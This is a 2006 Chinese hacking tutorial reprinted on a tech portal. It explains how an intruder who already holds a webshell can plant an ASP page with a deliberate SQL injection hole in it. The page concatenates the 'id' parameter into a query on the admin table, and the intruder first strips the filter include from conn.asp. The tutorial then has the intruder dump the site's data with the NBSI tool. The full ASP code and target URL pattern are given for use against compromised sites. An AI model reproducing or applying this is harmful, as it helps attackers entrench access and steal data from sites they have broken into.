首页 电脑 电脑学堂 查看内容

在webshell基础上伪造SQL注入点

2006-6-22 00:00 663 0

摘要:     有webshell了,可以用它直接连接数据库来执行数据查询,不用再伪造注入点文件了,另外你可以直接修改网站上的原ASP文件,把里面的过滤函数包括语句删除掉就有注入...
关键词: nbsp 文件 ASP 函数 标上 数据库 语句 conn 面的 直接

    有webshell了,可以用它直接连接数据库来执行数据查询,不用再伪造注入点文件了,另外你可以直接修改网站上的原ASP文件,把里面的过滤函数包括语句删除掉就有注入点了,一般过滤函数都inlcude在数据库连接文件conn.asp文件中.   在目标上先构造一个存在注入点的文件a.asp,里面的admin表是存在的,conn.asp是数据库连接程序,记得要把conn.asp文件中过滤函数包括语句给删掉,ASP代码如下:   <!--#include file="conn.asp"-->   <%   dim rs,strSQL,id   set rs=server.createobject("ADODB.recordset")   id = request("id")   strSQL = "select * from admin where id=" & id ’如果没有这个admin表,可以自己建立一个表和字段   rs.open strSQL,conn,1,3   rs.close   %>   然后输入:http://目标IP/a.asp?id=1   完成了,就这么简单,其他的信息就让他全部自己暴露出来吧.打开nbsi,一顿狂注,什么信息都出来啦,慢慢的浏览着他的目录.  
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部